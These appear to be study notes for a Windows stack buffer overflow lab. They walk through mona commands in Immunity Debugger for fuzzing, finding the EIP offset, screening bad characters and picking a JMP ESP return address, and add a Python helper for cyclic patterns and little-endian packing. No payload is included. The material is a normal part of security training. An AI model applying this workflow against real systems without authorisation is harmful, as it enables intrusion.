- Open Immunity Debugger as administrator and open the exe
- Set the mona working directory:
!mona config -set workingfolder c:\mona\
- Run the fuzzer script
Fuzzer Script
- Generate a pattern with mona, using the last length sent by the fuzzer script + 100/200:
!mona pattern_create 2000
- Copy the pattern from the file mona wrote to the working folder and append it to the pattern script
Pattern Script
- After running the pattern script, copy the EIP value from the crash and run mona to obtain the offset:
!mona pattern_offset <EIP_value>
- Obtain the badchar bytearray with mona (already excluding \x00) and run the badchar script:
!mona bytearray -b "\x00"
Badchar
- There are two options to identify badchars. First: click ESP, follow in dump, and look for bytes that stand out as outliers. Second: run the following mona command; when it reports consecutive badchars, usually only the first one is really bad (the rest are a side effect), so remove only that one, regenerate the bytearray and recheck:
!mona compare -f C:\mona\bytearray.bin -a <ESP_addr>
- Obtain a return address with mona:
!mona jmp -r esp
# If that fails, filter for addresses that do not contain badchars:
!mona jmp -r esp -cpb "\x00"
Then convert it to little endian:
Addr = 625011AF
retn = "\xAF\x11\x50\x62"
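As an added example (not the author's scripts and not mona itself), a pure-Python equivalent of the pattern_create / pattern_offset steps and the little-endian conversion above, so an offset reported by the debugger can be double-checked offline. Function names are this example's own; the pattern layout is the Metasploit/mona one (Aa0Aa1...).

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes before the pattern repeats


def pattern_create(length: int) -> bytes:
    """Equivalent of `!mona pattern_create <length>`: a cyclic pattern made of
    3-byte chunks Upper+lower+digit, so every 4-byte window is unique."""
    if not 0 < length <= MAX_PATTERN:
        raise ValueError(f"length must be 1..{MAX_PATTERN}")
    chunks = (
        f"{u}{l}{d}".encode()
        for u in ascii_uppercase for l in ascii_lowercase for d in digits
    )
    out = b""
    for chunk in chunks:
        if len(out) >= length:
            break
        out += chunk
    return out[:length]


def pattern_offset(eip_hex: str, length: int = 2000) -> int:
    """Equivalent of `!mona pattern_offset <EIP_value>`.

    The debugger shows EIP as a big-endian hex number, but x86 loaded it
    from little-endian memory, so the bytes are reversed before searching.
    Falls back to the big-endian byte order, as mona does, if that misses."""
    value = int(eip_hex, 16)
    pattern = pattern_create(length)
    for order in ("<I", ">I"):
        idx = pattern.find(struct.pack(order, value))
        if idx != -1:
            return idx
    raise ValueError(f"{eip_hex} not found in a pattern of length {length}")


def to_little_endian(addr_hex: str) -> bytes:
    """Pack an address such as 625011AF so it lands in memory as AF 11 50 62,
    i.e. the `retn` string shown above."""
    return struct.pack("<I", int(addr_hex, 16))


if __name__ == "__main__":
    # Constructed crash value: the bytes "n9Co" from the pattern landed in EIP.
    print(pattern_offset("6F43396E"))        # offset within the 2000-byte pattern
    print(to_little_endian("625011AF"))     # b'\xaf\x11Pb'
```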